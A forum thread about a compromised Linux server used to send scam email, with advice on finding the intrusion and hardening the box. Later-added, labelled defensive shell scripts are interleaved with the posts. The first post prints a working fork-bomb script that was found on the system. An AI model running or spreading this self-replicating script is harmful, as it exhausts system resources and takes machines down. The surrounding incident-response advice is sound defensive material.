  1. #1
    Just Joined!
    Join Date
    Jun 2005
    Posts
    8

    I've been hacked!


    I hope someone could give me some pointers. I found several strange files in the /tmp directory; one of them has the following content. The name of the file is forkbomb.sh
    Code:
    ####################################################################
    # Hello,
    #
    # Welcome to this forkbombing program. This program has the potential
    # to even bring the biggest mainframes to its knees. 
    #
    #####################################################################
    #
    # YOU ARE CRACKED!! THIS PROGRAM WILL KILL YOUR SPAMMING SERVER
    # Your server was sending eBay scam mails because of an IRC botnet
    # server running in /tmp. It is called sess_<something>; the
    # botnet client itself is running in /tmp/sex, and is contained
    # in /tmp/sex3.tgz
    #####################################################################
    #
    # shut things down. 
    #####################################################################
    #
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    I noticed that I was getting so many returned emails and I couldn't figure out why. Evidently these scripts were sending eBay scam emails from my server. Some of the files are owned by apache and some by root. Can someone tell me how they broke into my system, so I can protect myself? I am running a DNS, web, MySQL and sendmail server and I hope my customer information has not been compromised...
    I don't mind reinstalling the system; I have backups of all the information, but I would like to know what I was doing wrong. There is another Perl script for which I cannot determine exactly everything that was being done. I do not want to post it here because the code is a lot, but if someone wants to take a look please let me know.

    I would like to find out to what extent my system was damaged or compromised. Can someone help?

    Thank you guys.

  2. #2
    Linux Guru kkubasik's Avatar
    Join Date
    Mar 2004
    Location
    Lat: 39:03:51N Lon: 77:14:37W
    Posts
    2,396
    First and most important step: view the /etc/passwd file and look for any suspicious users. Change all your passwords, and (if you have backups) remove any users who you think aren't legitimate. Look at your logs; if some of the files are owned by apache, it's most likely the break-in occurred through your webserver. Check the logs in /var/log (or something similar) and generally poke around. Some might be so large that it'll be close to impossible to manually look through them all (like httpd.access), but you should be able to get a general idea of where the break-in occurred.
    Avoid the Gates of Hell. Use Linux
    A Penny for your Thoughts

    Formerly Known as qub333
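The reply above names two places to start: /etc/passwd and the web server's access log. The script below is an added example (not posted by anyone in this thread) that automates that first pass. Both functions take a file path, so they can be run against a copy pulled from a backup or a mounted image rather than the live system. The passwd and access-log contents at the bottom are constructed samples, not data from the poster's server; the UID cutoff of 1000 for "system account" is an assumption (older distributions used 500).

```shell
#!/bin/sh
# Added example, not code from this thread: first-pass triage of /etc/passwd
# and an Apache access log. Run on a real box as:
#   check_passwd /etc/passwd
#   top_error_clients /var/log/httpd/access_log

# Print one line per suspicious passwd entry:
#   uid0:<name>          a second UID-0 account (root-equivalent)
#   nopass:<name>        empty password field (login with no password)
#   sysuid-shell:<name>  system account (UID < 1000, an assumption) with a shell
check_passwd() {
    awk -F: '
        $3 == 0 && $1 != "root"               { print "uid0:" $1 }
        $2 == ""                              { print "nopass:" $1 }
        $3 > 0 && $3 < 1000 && $7 ~ /sh$/     { print "sysuid-shell:" $1 }
    ' "$1"
}

# Count 4xx/5xx responses per client address in a Common/Combined Log Format
# access log and print "ip count", busiest client first. One address behind
# many errors is the usual trace of scanning that precedes a web break-in.
top_error_clients() {
    awk '$9 ~ /^[45][0-9][0-9]$/ { print $1 }' "$1" \
        | sort | uniq -c | sort -rn \
        | awk '{ print $2, $1 }'
}

# --- constructed sample inputs (not real data) ---------------------------
SAMPLE_PASSWD=$(mktemp)
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
bob:x:1001:1001:Bob:/home/bob:/bin/bash
toor:x:0:0::/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/sh
guest::1002:1002::/home/guest:/bin/sh
EOF

SAMPLE_ACCESS_LOG=$(mktemp)
cat > "$SAMPLE_ACCESS_LOG" <<'EOF'
10.0.0.5 - - [12/Jun/2005:03:14:01 +0000] "GET /admin/ HTTP/1.0" 403 281
192.0.2.7 - - [12/Jun/2005:03:14:02 +0000] "GET /index.html HTTP/1.0" 200 5120
10.0.0.5 - - [12/Jun/2005:03:14:03 +0000] "GET /phpmyadmin/ HTTP/1.0" 404 281
10.0.0.5 - - [12/Jun/2005:03:14:04 +0000] "GET /cgi-bin/ HTTP/1.0" 403 281
198.51.100.9 - - [12/Jun/2005:03:14:05 +0000] "GET /missing.gif HTTP/1.0" 404 200
EOF

echo "== passwd findings =="
check_passwd "$SAMPLE_PASSWD"
echo "== clients by error count =="
top_error_clients "$SAMPLE_ACCESS_LOG"
```

On the constructed sample this flags `toor` (second UID 0), `games` (system UID with a shell) and `guest` (empty password field), and ranks 10.0.0.5 first with three error responses. The passwd check is deliberately coarse: on a real system compare the hits against the distribution's stock accounts before deleting anything, and remember that a compromised host's own tools and logs may have been altered, which is why working from a backup or image is preferable.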

  3. #3
    Just Joined!
    Join Date
    Jun 2005
    Posts
    8

    Thank you

    Thank you for responding. I didn't feel comfortable, so I went ahead and reinstalled the system again. I am really going to try to pay more attention to the security issues from now on. Thank you.

  4. #4
    Just Joined!
    Join Date
    Jul 2005
    Location
    Carbondale, IL
    Posts
    11
    Use logwatch. It goes through the logs and notices stuff like 403s and other things from Apache, and other logging software like sendmail, and your disk space. It is a good utility. It emails the root user what it finds suspicious. I love it.

  5. #5
    Linux Guru bigtomrodney's Avatar
    Join Date
    Nov 2004
    Location
    Ireland
    Posts
    6,127
    Rootkit Hunter / rkhunter is excellent. At least I think it is; I've never found a rootkit.
    I had a few more attempts at my ssh last night. I opened it for half an hour to test it, had a mate connecting, but someone else tried to get me. Good mind to post their IP up here......

    Nah I'll resist

  6. #6
    Just Joined!
    Join Date
    Jul 2005
    Location
    Inside the Kernel (somewhere)
    Posts
    41
    While rkhunter/rootkithunter/logcheck/chkrootkit are all good, they probably wouldn't have picked this one up. The key here is keeping your public_html software secure, and knowing what it does. In addition, you should (at minimum) have a secure tmp partition, mounted noexec.
    You might also check into mod_security and supportive rules.
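The reply above recommends a separate /tmp mounted noexec. The script below is an added example (not from this thread) that checks whether a mountpoint actually carries the noexec, nosuid and nodev options, reading a file in /proc/mounts format so the same check works on the live system or on a captured copy. The mounts table at the bottom and the device names in it are constructed; the fstab line in the comment is an illustration, not a line from anyone's system.

```shell
#!/bin/sh
# Added example, not code from this thread: verify the mount options on /tmp.
# Run on a real box as:  missing_hardening /proc/mounts /tmp
# A matching fstab entry (constructed illustration) would look like:
#   /dev/sda3  /tmp  ext3  defaults,nosuid,nodev,noexec  0 2
# and the options can be applied without a reboot with:
#   mount -o remount,nosuid,nodev,noexec /tmp

# Print the comma-separated option list for mountpoint $2 from mounts file $1.
# /proc/mounts lists mounts in order, so the last match is the one in effect.
mount_opts() {
    awk -v mp="$2" '$2 == mp { opts = $4 } END { print opts }' "$1"
}

# Succeed (exit 0) if option $3 is present on mountpoint $2 in mounts file $1.
has_opt() {
    mount_opts "$1" "$2" | tr ',' '\n' | grep -qx "$3"
}

# Report on mountpoint $2: "missing" if it is not a separate mount at all,
# otherwise the hardening options (out of nosuid,nodev,noexec) that are
# absent; an empty result means all three are set.
missing_hardening() {
    mp="$2"
    if [ -z "$(mount_opts "$1" "$mp")" ]; then
        echo "missing"
        return
    fi
    out=""
    for o in nosuid nodev noexec; do
        has_opt "$1" "$mp" "$o" || out="$out${out:+,}$o"
    done
    echo "$out"
}

# --- constructed sample mounts table (not from a real system) ---------------
SAMPLE_MOUNTS=$(mktemp)
cat > "$SAMPLE_MOUNTS" <<'EOF'
/dev/sda1 / ext3 rw,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec 0 0
/dev/sda3 /tmp ext3 rw,nosuid,relatime 0 0
EOF

for mp in /tmp /dev/shm /var/tmp; do
    echo "$mp: $(missing_hardening "$SAMPLE_MOUNTS" "$mp")"
done
```

On the sample table /tmp is a separate mount but lacks nodev and noexec, /dev/shm is fully hardened, and /var/tmp is not a separate mount (so it inherits the root filesystem's options and deserves the same treatment). One caveat a defender should keep in mind: noexec stops the kernel from executing binaries and scripts from that filesystem directly, but an interpreter invoked explicitly, as in the `sh ./forkbomb.sh` lines in the first post, can still read and run a script stored there. The option raises the bar and removes a common drop-and-run pattern; it is a layer, not a complete barrier, which is why the reply pairs it with keeping the web applications themselves secure.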
